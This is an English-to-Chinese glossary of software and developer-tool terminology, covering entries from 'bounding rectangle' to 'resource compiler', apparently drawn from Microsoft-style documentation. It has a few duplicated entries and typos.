bounding rectangle 边框
box 装箱 (v.)
break 中断
break compatibility 破坏兼容性
break execution 中断执行
break mode 中断模式
break state 中断状态
Bring Forward 上移一层
Bring In Front 置前
Bring to Front 置于顶层
broker 中间装置
browsable 可浏览
Browse With 浏览方式
Brush 画笔
bubbling 冒泡
bucket 存储桶
buddy 合作者
buffer 缓冲区
build 生成 (v.)；版本 (n.)
building block 构造块
built-in 内置
bulk 批量
bulk row fetching 批量取行
Bulleted List 项目符号列表
business logic 商业规则
business process 业务处理
business rule 商业规则
button control 按钮控件
C calling convention C 调用约定
C run-time library C 运行时库
cab file cab 文件
cache 缓存
cacheability 可缓存性
call 呼叫
call a com object 调用 COM 对象
call back 回调
call invoke 调用 invoke（调用）
called procedure 被调用过程
caller 调用方
calling code 呼叫代码
calling convention 调用约定
calling process 调用进程
call-out interception 调出侦听
caption 题注
caret 插字号
carriage return-linefeed 回车-换行
cascade 级联
case statement case 语句
case-sensitive 区分大小写
cast (类型)转换
catalog 目录
catch 捕捉
catch block catch 块
catch handler catch 处理程序
category 类别
caution 警告
cell 存储单元
cell padding 单元格填充
cell span 单元格跨距
Center Screen 中心屏幕
Certificate Creation Utility 证书创建实用工具
challenge-response 质询－响应
change 更改
character offset 字符偏移量
chart 图表
chat 聊天
check 复选
check box control 复选框控件
check constraint CHECK 约束
check in 签入
check out 签出
check state 复选状态
check the condition 检查条件
check the entry 检查项
check the number 检查数目
check the registry 检查注册表
check the result 检查结果
check the state 检查状态
check the validity 检查有效性
check the value 检查值
child 子
child code 子代码
child form 子窗体
circular reference 循环引用
class 类别
Class Builder Utility 类生成器实用工具
class declaration 类声明
class definition 类定义
class factory 类工厂
class initializer 类初始值设定项
Class Library Reference 类库参考
class member 类成员
class module 类模块
class object 类对象
class type 类类型
Class View Group By Type 类视图“按类型分组”
classic 传统（型）；传统风格（的）；经典
clause 子句
clean 无变动（注：与 dirty 相对）
click event procedure Click 事件过程
client area 工作区
Client Batch cursor library 客户端批处理游标库
client coordinate 工作区坐标
client request 客户端请求
client-based 基于客户端的
client-side 客户端
clip 剪辑
Clipboard format 剪贴板格式
Clipboard-viewer chain 剪贴板查看器链
clipping region 剪切区域
clone 克隆
close parenthesis 右括号
Close region 临近区域(Close Region)
close up 闭合
closing set of angle bracket 结束双尖括号
closing tag 结束标记
CLS compliant 符合 CLS
clustered index 聚集索引
code 代码
code editor 代码编辑器
code example 代码实例
code locale 代码区域设置
code module 代码模块
code pane 代码窗格
code tracing 代码跟踪
code wizard 代码向导
codebase 基本代码
code-behind 代码隐藏
Collapse to Definitions 折叠到定义
Collate 逐份打印
collection 集合
collection editor 集合编辑器
color scheme 配色方案
column span 列跨距
COM Classic COM 传统型
COM component COM 组件
combinator 连结符
combo box control 组合框控件
command 命令
command handler 命令处理程序
Command line builds 命令行编译
command routing 命令传送
comment token 注释标记
Common Control 公共控件
Common Dialog 通用对话框（Common Dialog）
common files 公共文件
Common Object File Format 通用对象文件格式
common resource file 公共资源文件
common Web files 公共 Web 文件
communicate 通信
compact 压缩；紧凑
compact version 精简版本
comparer 比较器
compile time 编译时
compiler 编译程序
complex-bound 复杂绑定
component 组件
component authoring 组件创作
Component Gallery 组件库
Component Object Model 组件对象模型 or COM
Component Services Admin Tools 组件服务管理工具
Component Tools Guide 组件工具指南
component tray 组件栏
Component Wizard 组件向导
component-based 基于组件的
compose buffer 写缓冲区
composite 复合
concatenation operator 串联运算符
concurrency 并发
Congratulations 祝贺您
connect string 连接字符串
connectable object 可连接对象
connection map 连接映射
connection point 连接点
connection pooling 连接池
connection string 连接字符串
considerations 注意事项
constant 常数
constant expression 常数表达式
constituent control 构成控件
constraint 约束
constructor 构造函数
constructor initializer 构造函数初始值设定项
Consumer Template 使用者模板
contained control 包含的控件
container 容器
content-body 内容正文
context 上下文
context identifier 上下文标识符
context menu 上下文菜单
context window 上下文窗口
contextify 实现上下文；对…实现上下文
context-sensitive 区分上下文
contiguous 相邻的
contiguous range 连续范围
contract 协定
control 控制
control array 控件数组
control class 控件类
Control Containment 控件包容
Control Flow Obfuscation 控制流模糊处理
control instance 控件实例
control returns 控制返回
Control Test Container 控件测试容器
control view object 控件查看对象
Conversation 对话
conversion 转换
Cookieless 无 Cookie
coordinated universal time 协调通用时间
Copy 副本；复制
Copy Info 复制信息
correlation 相关
corrupt 损坏
count 计数
Cracker 黑客
critical section 关键部分
cross-process 进程间
cross-thread 线程间
crypt hash object 加密哈希对象
cryptographic object 加密对象
CSS Specific CSS 特定
Ctl Ctl 键；Ctl
Cursor 光标；游标
cursor library 光标库
custom 自定义
Custom Actions Management 自定义操作管理
Custom AppWizard 自定义应用程序向导
custom build rule 自定义生成规则
custom event 自定义事件
custom marshalling 自定义封送处理
custom resource template 自定义资源模板
cycle through 循环通过
Cyclic Redundancy Check 循环冗余校验 （CRC）
Dangling Reference 虚引用
DAO Query DAO 查询
DAO Recordset DAO 记录集
DAO Workspace DAO 工作区
dark shadow 阴影
data binding 数据绑定
data breakpoint 数据断点
data compartment 数据舱
Data Component Designer 数据组件设计器
data consumer 数据使用者
data environment 数据环境
Data Environment designer 数据环境设计器
Data Environment Extensibility Object Model 数据环境扩展性对象模型
Data Form Wizard 数据窗体向导
data grid 数据网格
data member 数据成员
Data Object Wizard 数据对象向导
data point 数据点
Data Report designer 数据报表设计器
data set 数据集
data source 数据源
data store 数据存储
data type 数据类型
Data View 数据视图
data-aware 数据识别
database class 数据库类
database connection 数据库连接
Database Designer 数据库设计器
database diagram 数据库关系图
database engine 数据库引擎
database management system 数据库管理系统
database object 数据库对象
Database Project Items 数据库项目项
database schema 数据库架构
datagram 数据报
DataSet DataSet(注:用作关键字时)；数据集(注:用于一般描述时)
DataSource DataSource（注:用作关键字时）；数据源（注:用于一般描述时）
DataTable DataTable（注:用作关键字时）；数据表（注:用于一般描述时）
date and time picker 日期和时间选择器
Daylight Saving Time 夏时制
DB Common Sourcing Module UI Resources 数据库公共源模块用户界面资源
DB Project Connection 数据库项目连接
DDE conversation DDE 对话
dead-letter 死信
deallocate 解除分配
debug 调试
debug build 调试版本
Debug configuration “调试”配置
debug heap 调试堆
debug mode 调试模式
debug monitor 调试监视器
debugger 调试程序
Decimal key 句点键
decimal separator 小数点分隔符
declaration 声明
declarator 声明符
decoder 解码器
decorated name 修饰名
Deep Copy 深层复制
default 默认
default action 默认操作
default behavior 默认行为
default case-insensitive hash code provider 不区分大小写的默认哈希代码提供程序
default constructor 默认构造函数
default hash code provider 默认哈希代码提供程序
default implementation 默认实现
default initial capacity 默认初始容量
default marshalling 默认封送处理
default maximum load factor 默认最大加载因子
default property page 默认属性页
Defect Report 缺陷报告
definition 定义
deformatter 反格式化程序
degrade 降级
degrade gracefully 完全降低
degrade performance 降低性能
delay-loaded 延迟加载
delegate 委托
delete operator 删除运算符
delineated square 画有边线的方形
denial of service attack 拒绝服务攻击
Dep. assembly nodes 部署程序集节点
Dep. MSM nodes 部署 MSM 节点
dependency 依赖项
dependency file 依赖项文件
dependent file 依赖文件
dependent project 依赖项目
deploy 部署
Deployment Editors 部署编辑器
Deployment Wizard 部署向导
deprecate 否决
deque 双端队列
derive 派生
derived 导出(的)；派生(的)
derived class 派生类
derived field 导出字段
derived type 派生类型
Description 说明
descriptor 描述符
deserialize 反序列化
design 设计
design mode 设计模式
Design Surface File 设计图面文件
design time 设计时
design view 设计视图
designer 设计器
designer host 设计器宿主
designer surface 设计器表面
designer window 设计器窗口
design-time 设计时
design-time instance 设计时实例
Design-Time-Only 仅用于设计时
destination application 目标应用程序
destination control 目标控件
destination device context 目标设备上下文
destination rectangle 目标矩形
destroy 损坏
destructor 析构函数
detect 检测
determine 确定
developer 开发人员
Developer edition 开发人员版
development environment 开发环境
device 设备
device context 设备上下文
device dependent 设备相关
Device Image 设备映像
DHTML Page designer DHTML 页设计器
diagnostic message 诊断消息
Diagram 关系图
diagram pane 关系图窗格
Diagram Surface 关系图面
dialog class 对话框类
dialog control 对话框控件
Dialog Data Exchange 对话框数据交换
Dialog editor 对话框编辑器
dialog template resource 对话框模板资源
dialog-based 基于对话框的
Diff-Merge 差异－合并
digest authentication 摘要式身份验证
dimensionality 维数
dimensions 尺寸；维数（注：指多个维度时）
dimmed appearance 浅灰色
directive 指令
directory 目录
disable 禁用
disassembly window 反汇编窗口
discussion list 讨论表
dispatch 调度
dispatch ID 调度 ID
dispatch interface 调度接口
dispatch map 调度映射
dispinterface 调度接口
dispose 处置
distribute 分布
Distributed Application 分布式应用程序
Distributed Component Object Model 分布式组件对象模型
Doc Relative 与文档相关的
Dock 停靠
dockable 可停靠的
dockable toolbar 可停靠工具栏
document class 文档类
document containment 文档包容
document/view architecture 文档/视图结构
domain 域
dominant control 主导控件
double buffering 双缓冲
double-ended queue 双端队列
double-precision floating point number 双精度浮点数字
downcast 向下转换
downstream 下游
drive letter 驱动器号
drop shadow 投影
drop target 放置目标
dropdown 下拉
dropshadow 投影
dual interface 双重接口
dump 转储
Duplicate pound (''#'') characters 重复（“#”）字符
dynamic array 动态数组
dynamic assembly 动态程序集
dynamic binding 动态绑定
dynamic creation 动态创建
dynamic cursor 动态游标
Dynamic Discovery Document 动态发现文档
Dynamic HTML object model 动态 HTML 对象模型
dynamic splitter window 动态拆分窗口
dynamic-link library 动态链接库
dynaset-type recordset 动态集类型记录集
earlier 以前
edit buffer 编辑缓冲区
edit control 编辑控件
edit mode 编辑模式
edit point 编辑点
Edition 版本
Elapsed Time 运行时间
element 元素
eliminate 消除
embed 嵌入
Emit 发出
Enabled 启用；有效的
encapsulate 封装
encapsulated interface pointer 封装接口指针
enclosing class 封闭类
enclosing type 封闭类型
encompassed type 所含类型
encompassing type 包含类型
end 结束
ending point 结束点
endpoint 端点
engine 引擎
Enter Enter 键
Enterprise Edition 企业版
enterprise template 企业级模板
entity 实体
entry 项
entry point 入口点
enumerated type 枚举类型
enumeration 枚举
enumerator 枚举器
enum-type 枚举类型
environment 环境
equality 相等
equality-expression 相等表达式
equivalent 等效
Erase 清除
error 错误
error handler 错误处理程序
error handling 错误处理
error message 错误消息
error number 错误号
error trapping 错误捕获
escape character 转义符
escape code 转义码
escape sequence 转义序列
evaluate 计算
event concentrator 事件集中器
event interface 事件接口
event listener 事件侦听器
event log 事件日志
event map 事件映射
event mask 事件屏蔽
event procedure 事件过程
event sink map 事件接收映射
event source 事件源
event subscription 事件订阅
event-driven 事件驱动
event-handling method 事件处理方法
evidence 证据
event sink map 事件接收映射
event source 事件源
event subscription 事件订阅
event-driven 事件驱动
event-handling method 事件处理方法
evidence 证据
evidence set 证据集
example code 代码示例
exception 异常
exception handler 异常处理程序
exception handling 异常处理
exception throw 引发异常
exclusive 独占
exclusive checkout 以独占方式签出
exclusive OR XOR
Exe Project EXE 项目
executable 可执行文件
execute 执行
existing 现有
exit 退出
exit a loop 退出循环
exit code 退出代码
explicit 显式
explicit instantiation 显式实例化
explicit interface member implementation 显式接口成员实现
explicit linking 显式链接
explore 浏览
expose 公开
expression 表达式
expression argument 表达式参数
expression evaluator 表达式计算器
extension DLL 扩展 DLL
external data source 外部数据源
external linkage 外部链接
face color 表面颜色
facet 方面
factorability 可分解性
failure 失败
FALSE/false FALSE/假
fast line 快速扫描线
fatal error 致命错误
favor speed 优选速度
feature 功能
fetch 提取
field data member 字段数据成员
figure 图形；图例；数据
File Associations Management 文件关联管理
file descriptor 文件说明符
file handle 文件句柄
File Manager 文件管理器
file pointer 文件指针
file scope 文件范围
File System and Scheduling Components 文件系统和调度组件
File System Editor 文件系统编辑器
filespec 文件规格
FileSystemWatcher Component 文件系统观察程序组件
fill 填充
fill in 填写
Filled Rectangle 实心矩形
filter 筛选器
finalize 完成
Find what 查找内容
finish 完成
fire 激发
"first-in, first-out" 先进先出
fixed-length 定长
fixed-length string 定长串
fixed-size array 固定大小数组
flag 标志
float 浮动
floating type 浮点型
floating-point type 浮点型
flow off 超出
focus 焦点
focus rectangle 聚焦框
footer 页角
For a complete list 有关完整列表
"For details, see" 有关详细信息，请参阅
For information about 有关信息
force 强制
forecolor 前景色
Foreground "前台,前景"
foreign key constraint 外键约束
foreign machine 外部计算机
foreign queue 外部队列
foreign table 外表
foreign-key table 外键表
forest 林
form 窗体
form 窗体
form control 窗体控件
form module 窗体模块
form view 窗体视图
formal parameter list 形参表
format string 格式字符串
Format Style Sheet 格式化样式表
formatter 格式化程序
formatting 格式化
formatting rectangle 格式化矩形
form-based application 基于窗体的应用程序
Forms Authentication Forms 身份验证
forward-only cursor 只进游标
Foundation Class Library 基础类库
four headed arrow 四向箭头
fractional-constants 小数常数
frame 框架
framework 框架
free 释放
Free Bytes 可用字节
free the memory 释放内存
free the structure 释放结构
free threaded marshaler 自由线程封送拆收器
free threading 自由线程处理
free-form modeling 自由窗体建模
Frequently Asked Questions 常见问题
friend function 友元函数
FrontPage Server Extension FrontPage 服务器扩展
Full Control component 完全控制组件
full-text search 全文搜索
Full-Width Alpha-Numeric 全角字母－数字
Full-Width Katakana 全角片假名
fully populated 完全填充
fully qualified name 完全限定名
fully qualified path 完全限定的路径
Function 功能；函数
function body 函数体
function call 函数调用
function counting 函数调用计数
function coverage 函数覆盖
function declaration 函数声明
function pointer 函数指针
function profiling 函数分析（Function Profiling）
function prototype 函数原型
function scope 函数范围
function template 函数模板
function timing 函数执行时间
Further Reading 其他阅读材料
gain access 获得访问权限
gain control 获得控制
gain information 获得信息
Garbage Collector 垃圾回收器
General 常规；通用
general accounting module 常规计帐模块
General DAO Recordset Tasks 常规 DAO 记录集任务
General Date 常规日期
General Number 常规数字
general sample 通用示例
generic-text 一般文本
get 获取
get accessor get 访问器
get area get 区域
get pointer get 指针
Gets or sets 获取或设置
global object 全局对象
global scope 全局范围
global setting 全局设置
global variable 全局变量
Glyph 标志符号
Go to 转到
Gozer Gozer；Gozer 处理
graphical representation 图形化表示形式
graphics method 图形方法
grid 网格
grid control 网格控件
Grid Layout 网格布局
Group By 分组依据
Group Members 组员
guarded section 保护区域
Guide Settings 参考线设置
Half-Width Alpha-Numeric 半角字母－数字
Half-Width Katakana 半角片假名
handle 句柄
Handle is not pinned 句柄未被固定
handler 处理程序
handy focus 快捷焦点
hard-code 硬编码
hash 哈希
hash algorithm 哈希算法
hash code 哈希代码
hatched pattern 阴影图案
header 头
header control 标头控件
header file 头文件
heap 堆
heap allocation 堆分配
Help topic 帮助主题
helper function Helper 函数
heuristics 试探法
hierarchical outline 分层大纲
high-level 高级别
Highlight 突出显示；高光点
high-order word 高序位字
history list 历史记录列表
hook function 挂钩函数
horizontal guideline 水平准线
Horizontal Spacing 水平间距
host 主机
host object 宿主对象
host window 宿主窗口
hosted control 寄宿的控件
hosting API 宿主 API
hot key control 热键控件
Hotfix 修补程序 (Hotfix)
hover 悬停
html tag replacer object HTML 标记替换器对象
HTTP request HTTP 请求
hub and spoke model 轮辐式模型
human-readable 可读的
Hyperlink 超级链接
icon 图标
ID ID
identity operator 恒等运算符
ignore 忽略
illegal 非法
illustrate 阐释
image 映像
image control 图像控件
image editor 图像编辑器
image list 图像列表；映像列表
image resource 图像资源；映像资源
IME composition window IME 撰写窗口
Immediate Mode 即时模式
immediate parent object 直接父对象
impersonation token 模拟令牌
implement 实现
Implement Interface Wizard 实现接口向导
implemented bulk row fetching 实现的批量取行
implementer 实施者
implicit 隐式
implicit conversion 隐式转换
import library 导入库
Important 重要事项
in spec 规格中
in the Project Explorer window 在项目资源管理器窗口中
In this Section 本节内容
include file 包含文件
incoming 传入（的）
Increase Vertical Spacing 增加垂直间距
increment 增量
Incremental build 增量编译
incremental linker 增量链接器
incremental status 增量状态
Independent Developer 独立开发商
indexer 索引器
Indicator Margin Click 单击指示器边距
inference rule 推理规则
infix notation 中缀符
inherit 继承
inheritance chain 继承链
inheritors 继承者
initial capacity 初始容量
initial value 初始值
initialization 初始化
initialization vector 初始化向量
initiate 开始；启动
injected code 插入的代码
Inline 内联
inline assembler 内联汇编
inline assembly code 内联程序集代码
inline function 内联函数
inner exception 内部异常
inner object 内部对象
in-place 就地
in-place activation 就地激活
in-place active 就地活动
in-process 进程内
input focus 输入焦点
input mask 输入掩码
Input Method Editor 输入法编辑器
insert new 新插入
inset 插页？
Install on Demand 即需即装
instance 实例
instantiate 实例化
Instantiate Live Controls 实例化活控件
int type int 类型
intaller 安装程序
integer 整数
integer literal 整数
integer type integer 类型
integer value 整数值
integral type 整型
integral value 整数值
integrated development environment 集成开发环境
Intellisense 智能感知
interact 交互
interface 接口
internal error 内部错误
internal linkage 内部链接
Internet Information Server Administration object Internet Information Server 管理对象
Internet Information Services Internet 信息服务
Internet Server Application Programming Interface Internet 服务器应用程序编程接口
Internet/Intranet/Extranet Services SDK Internet/Intranet/extranet 服务SDK
interoperate 互用；交互操作
interrupt 中断
intersection 交集
intrinsic control 内部控件
intrinsic function 内部函数
Introduction 介绍
invalid 无效的
Invalid literal exponent 无效指数
invalidate 无效
invocation list 调用列表
invoke 调用
iostream library iostream 库
Is Dirty 已更新
ISAPI Extension Wizard ISAPI 扩展向导
isolated storage scope 独立存储范围
issue 颁发
italic 斜体
item 项目
iterate through 循环访问
iteration 迭代
jagged 交错的
Jet database engine Jet 数据库引擎
join 联接
journal queue 日记队列
jump 跳转
junction table 联接表
Just-in-time debugging 实时调试
key 密钥
key as string 键为字符串
key feature 主要功能
key file 密钥文件
key value 键值
keyboard focus 键盘焦点
keyset-driven 键集驱动
keyset-type 键集类型
kill 注销；取消
Knowledge Base 知识库
label 标记
label control 标签控件
labeled statement 标记语句
LAME! 报告错误！
language equivalents 等效语言
Language Reference 语言参考
late binding 晚期绑定
late-bound 后期绑定
layered windows feature 分层窗口功能
Layout 布局
lead byte 前导字节
leading zero 前导零
least significant byte 最低有效字节
ledger 帐目型
left outer join 左外部联接
legal 合法
less derived 派生程度较小的
level 等级
leverage （综合）利用；平衡
lexical scope 词法范围
library 库
lifetime 生存期
limit 限制
Limit SQL output 限制 SQL 输出
line break 换行符
line of code 代码行
line style 线型
line-continuation character 行继续符
linger 逗留
link 链接
Link Master Fields 链接主字段
link time 链接时间
linkage 链接
linker 链接器
list box control 列表框控件
list control 列表控件
list view control 列表视图控件
listen 听
listen for requests 侦听请求
listen on 在…上侦听
listen to a queue 侦听队列
Lite control Lite 控件
literal literal；文本
literal character 原义字符
load 加载
load balancing 负载平衡
Load on Startup 在启动时加载
local constant 局部常量
local machine 本地计算机
local scope 局部范围
local variable 局部变量
Locale 区域设置
location 位置
location breakpoint 位置断点
locator 定位器
lock 锁
lock count 锁计数
locked 锁定
locking 锁定
Log 日志
logical headings 逻辑标头
logical line 逻辑行
logical palette 逻辑调色板
logical unit 逻辑单元
Long 长
long integer 长整型
long pointer 长指针
long value 长值
look for 查找
Look in 查找；查找范围；搜索
look up 查找
lookahead 预测先行
lookup 查找
loop control variable 循环控制变量
loop through 依次通过
loosely coupled event 松耦合事件
lower bound 下限
lower-level 低级别
low-order word 低序位字
l-value l 值
macro expansion 宏展开
Macro Explorer 宏资源管理器
Macro Hierarchy Type Library 宏层次结构类型库
Macros Dialog 宏对话
Macros IDE 宏 IDE
Main form 主窗体
main frame window 主框架窗口
main function 主函数
main thread 主线程
main window 主窗口
mainframe 主机
Maintenance Mode 维护模式
Maintenance Utility 维护实用工具
Make Same Size 使大小相同
make the project 生成项目
Makefile 生成文件
managed array 托管数组
managed class 托管类
managed code 托管代码
managed extension 托管扩展
managed heap 托管堆
managed object 托管对象
management 管理
manifest 清单
manipulate data 操作数据
manual 手动
many-to-many 多对多
map 图
mapping mode 映射模式
margin 边距
margin indicator 边距指示符
Margin Indicator bar “边距指示符”栏
marquee 字幕
marshal 封送
marshal-by-reference class 引用封送类
marshalling 封送处理
Mask 屏蔽；掩码
match 匹配
Match Case 大小写匹配
Match related words 匹配相关字
matching 相应的；匹配的
matrix 矩阵
maximum-scroll arrow/ minimum-scroll arrow/ up-scroll arrow 最大程度滚动箭头/最小程度滚动箭头/向上滚动箭头
MDI child form MDI 子窗体
MDI child window MDI 子窗口
MDI frame window MDI 框架窗口
member 成员
member function 成员函数
member variable 成员变量
membership condition 成员条件
memory allocation 内存分配
memory allocator 内存分配器
memory block 内存块
memory cache base object 内存缓存基对象
memory manager 内存管理器
menu control 菜单控件
menu editor 菜单编辑器
Menu show recently used commands first 菜单首先显示最近使用的命令
message handler 消息处理程序
message map 消息映射
message pump 消息泵
message reflection 消息反射
message sink 消息接收
message string set 消息字符串集
message-handler function 消息处理函数
message-map entry 消息映射项
metadata token 元数据标记
method 方法
method call 方法调用
method group 方法组
method invocation 方法调用
MFC Advanced Concepts MFC 高级概念
MFC AppWizard MFC 应用程序向导
MFC DAO class MFC DAO 类
MFC DAO object MFC DAO 对象
MFC Database MFC 数据库
MFC ODBC class MFC ODBC 类
MFC Reference MFC 参考
MFC-based 基于 MFC 的
middle-tier 中间层
migrate 迁移
mini-frame window 袖珍框架窗口
mini-server application 袖珍服务器应用程序
Misc 杂项
Miscellaneous 杂项
Miscellaneous files project saves last 最后保存杂项文件项目
MMC Snap-In Wizard MMC 管理单元向导
modal dialog 模式对话框
mode 模式
model 模型
modeless form 无模式窗体
module 模块
module level 模块级
moniker 名字对象
month calendar control 月历控件
more derived 派生程度较大的
More Information 详细信息
more recent version 较新版本
mouse button 鼠标按钮
mouse capture 鼠标捕获
mouse event 鼠标事件
mouse key 鼠标键
move down 下移
move up 上移
MSDN Training documentation set MSDN“培训”文档集
multibyte character 多字节字符
multibyte code page 多字节代码页
multicast 多播
multiple document interface 多文档界面
Multiple-Inheritance 多重继承
multiple-line edit control 多行编辑控件
multithreaded application 多线程应用程序
multi-user environment 多用户环境
mutually exclusive 互相排斥
naked attribute naked 属性
Naked Function Calls 裸函数调用
Name and Password Required 要求用户名和密码
name only 仅表名
named 命名的
named permission set 命名的权限集
namespace 命名空间
nanosecond 毫微秒
narrowing conversion 收缩转换
native 本机的
native heap 本机堆
native machine 本机
native-code application 本机代码应用程序
Native-only TCP/I 仅限本机的 TCP/IP
Navigation bar 导航栏
navigator 导航器
New any 新建项
New anyAttribute 新建属性
New Technology file system NTFS 文件系统
newline 换行
newline character 换行符
Next Screen 下一屏
No conversions are performed 未进行转换
node 节点
nonaggregated 非聚集
non-blank 非空白
non-debug version 非调试版本
non-MFC 非 MFC
non-null 非空
non-scatter 非散点程序集
non-static 非静态
non-transactional queue 非事务性队列
non-virtual 非虚拟
non-visual 非可视
non-zero 非零
normal viewing 正常查看
Northwind OLE DB Data Link Northwind OLE DB 数据链接
notation 表示法
note 注意
Notepad “记事本”(Notepad)
Notes to Inheritors: 对继承者的说明：
nothing 无定义（注：根据上下文而定）
notification 通知
notification message 通知消息
nudge 微移
nudge down one pixel 向下微移一像素
null character 空字符
null pointer 空指针
null reference 空引用
null value 空值
nul-terminated 空终止
number of bytes 字节数
number of dimensions 维数
Numbered List 编号列表
numeric entity 数字实体
numeric expression 数值表达式
numeric type numeric 类型
object 对象
Object Browser 对象浏览器
object expression 对象表达式
object hierarchy 对象层次结构
object library 对象库
object lifetime 对象生存期
object map 对象映射
object model 对象模型
object module 对象模块
object qualifier 对象限定符
object reference 对象引用
object tag 对象标记
object variable 对象变量
Object Viewer 对象查看器
Object Wizard 对象向导
object-oriented programming 面向对象的编程
occurrence 匹配项；（视上下文也可省略不译）
ODBC Administrator ODBC 管理器
ODBC Cursor Library ODBC 游标库
ODBC data source ODBC 数据源
ODBC Driver Manager ODBC 驱动程序管理器
ODBC SDK ODBC SDK
OLE Automation OLE 自动化
OLE container OLE 容器
OLE DB connection OLE DB 连接
OLE DB Provider OLE DB 提供程序
OLE DB Template OLE DB 模板
OLE/COM Object Viewer OLE/Com 对象查看器
On button down 当按钮按下
one-based 从一开始的
One-Click Web Hosting 鼠标一点，轻松发布到 Web
one-liner 单行方式
one-to-many 一对多
one-to-one 一对一
Open Database Connectivity 开放式数据库连接
open parenthesis 左括号
Open With 打开方式
opening brace 左大括号
opening tag 开始标记
operand 操作数
operation 操作
operator 操作符/运算符
optimistic concurrency 开放式并发
optimization 优化
optimized code 优化的代码
order 顺序
ordinal 序号
ordinal index value 序号索引值
other 其他
Out of Memory 内存不足
Out Parameter 输出参数
outgoing interface 输出接口
Outlined Rectangle 空心矩形
out-of-band data 带外数据
out-of-process 进程外
output device context 输出设备上下文
output stream 输出流
Overall Steps 全部步骤
overhead 系统开销
overlap 重叠
overlay image 覆盖图像
overlay not resident 覆盖非驻留
overload 重载
Overload Induction 重载归纳(Overload Induction)
overload list 重载列表
overload resolution 重载决策
overloaded function 重载函数
overloaded method 重载方法
overloaded operator 重载运算符
overloaded version 重载版本
overridable public function 可重写的公共函数
override 替代
Overview 概述
overwrite 覆盖
own 所有
owned window 附属窗口
owner 所有者
owner window 所有者窗口
owner-drawn 所有者描述的
ownership 所属权
pack pragma 压缩杂注
package 数据包
Package Body 包正文
packaging process 打包过程
padding 填充
page designer 网页设计器
pager button 页导航按钮
paint 绘画
painter 绘画器
palette 调色板
pane 窗格
panel 面板
parameter 参数
parameter data member 参数数据成员
parameter list 参数列表
parent 父
parent form 父窗体
parent item 父项
parent object 父对象
parent process 父进程
parent topic 父主题
parent window 父窗口
parenting control 父级控制
parse map 分析映射
partical 粒子
pass 传递
pass over 经过
Passport Authentication Passport 身份验证
Paste Special 选择性粘贴
Paste the code into the Declarations section 将代码粘贴到声明部分
peek 查看
peer 对等
pending 挂起
per-column 按列的；基于列的；针对于列的
performance 性能
Performance Counter 性能计数器
Performance Monitor 性能监视器
permission 权限
persist 持续
persistence 持久性；持久性存储
persistent data 持久性数据
persister 持续程序
Personal Tier Application Management 个人层应用程序管理
Pessimistic locking 保守式锁定
physical brush 物理画刷
pick 选取
Picker 选择器
picture 图片
picture box 图片框
pie section 扇形区
pipe 管道
pixel 像素
plate 盘片
Playback 播放
pointer 指针
pointer type 指针类型
pointer-to-member 指向成员的指针(n.)
policy class 策略类
polymorphism 多形性
pool 池
populate 填充
popup 弹出消息；弹出菜单；弹出…（视上下文而定）
positioning 定位
Possible values 可能的值
postback 回发
post-processor 处理器后
potential mod by 0 潜在的以 0 求模
pragma 杂注
precedence 优先
precompile 预编译
precompiled header 预编译头
predefined 预定义的
preferences 首选项
prelink 预链接
preprocessor 预处理器
preprocessor directive 预处理器指令
Presentation Tier 表示层
Preview Note 预览说明
Preview Release 预览版
previous 以前的
Previous Screen 上一屏
primary key 主键
primary sort key 主要排序关键字
primitive 基元
principal 主体
Principal Principal(注:为对象名时)
printer device context 打印机设备上下文
private 私有
Private Bytes 专用字节
private keyword 私有关键字
private method 私有方法
private object 私有对象
private part number 专用部件号
Private Queues 专用队列
private variable 私有变量
privilege 特权
Privileged Time 特权时间
procedure 过程
procedure attribute of a property 属性的“过程属性”
procedure call 过程调用
process 处理
process resource 进程资源
processing 处理
production 产品
production database 成品数据库
Production Server 成品服务器
Professional Edition 专业版
profiler 分析器
profiling error 分析错误
programmatic access 编程访问
Programming Model 编程模型
progress 进度
progress bar control 进度栏控件
Progress Manager 进度管理器
project 项目
Project Dependencies 项目依赖项
project directory 项目目录
Project Explorer 项目资源管理器
project group 项目组
project item configuration 项目项配置
Project Property Pages “项目属性页”（注：泛指一类属性页)
project workspace 项目工作区
projectitem 项目项
properly 正确地，适当地
property 属性
property attributes 属性特性
property browser 属性浏览器
Property Get procedure Property Get 过程
Property Let procedure Property Let 过程
property map 属性映射
Property Page 属性页
Property Page Wizard 属性页向导
property set 属性集
Property Set procedure Property Set 过程
property sheet 属性表
provider 提供程序
pseudo-marshalling 伪封送
public 公共
public class 公共类
public function 公共函数
public key 公钥
public keyword 公共关键字
public method 公共方法
public string 公共字符串
public variable 公共变量
publisher 出版商
push 推
push button 下压按钮
put area 放置区域
put pointer 放置指针
put up modal UI 提供模式用户界面
qualified name 限定名
query 查询
query a webclass 查询 webclass
query an object 查询对象
Query Builder 查询生成器
Query Designer 查询设计器
query the database 查询数据库
QuickStart 快速入门
RAD Data Feature Team RAD 数据功能组
radio check mark 选中标记
raise 引发
raise an error 引发错误
raise an event 引发事件
raise an exception 引发异常
rank 秩； 等级
rank array 秩数组
Rapid Application Development 应用程序快速开发
raw data 原始数据
raw interface pointer 原始接口指针
RDO RDO
reader 读取器；阅读器
real object 真实对象
real proxy 真实代理
realign 重新对齐
rebar band rebar 带区
rebar control rebar 控件
rebuild 重新生成
receive buffer 接收缓冲区
record 记录
record view class 记录视图类
Recorder 记录器
recordset 记录集
recordset field 记录集字段
recordset field data member 记录集字段数据成员
recordset object 记录集对象
rect rect
rectangle 矩形
rectangular region 矩形区域
recurrence pattern 定期模式
recursive 递归
recycle 回收
reference 引用
reference count 引用数
Reference Counting 引用计数
reference key 引用键
reference type 引用类型
referential integrity 引用完整性
refine 精炼；简化
refresh 刷新
register 注册
Registers window “寄存器”窗口
registrar script 注册器脚本
registration database 注册数据库
registry 注册表
registry key 注册表项
Registry Settings Management 注册表设置管理
registry subkey 注册表子项
regular DLL 规则 DLL
regular expression 正则表达式
related information 相关信息
Related Sections 相关章节
relationship line 关系线
release 发行
release all resources 释放所有资源
release build 发布版本
Release configuration “发布”配置
release the mouse button 释放鼠标按钮
release version 发布版本
Remarks section 备注部分
remote 远程的
Remote Automation 远程自动化
remote computer 远程计算机
remote data 远程数据
remote data source 远程数据源
Remote Debug Monitor 远程调试监视器
remote debugging 远程调试
remote machine 远程计算机
remote procedure call 远程过程调用
remote server 远程服务器
remoting 远程处理
Remove 移除
render 呈现
rental model 租用模型
repeater 中继器
report 报表
repository 知识库
representation 表示形式
request 请求
Required 必选
reserve area 保留区域
reserved attribute 保留属性
reset 重置
Reset my usage data 重置惯用数据
reside 驻留
resolve 解析
resolver 解析程序
resource 资源
resource compiler 资源编译器
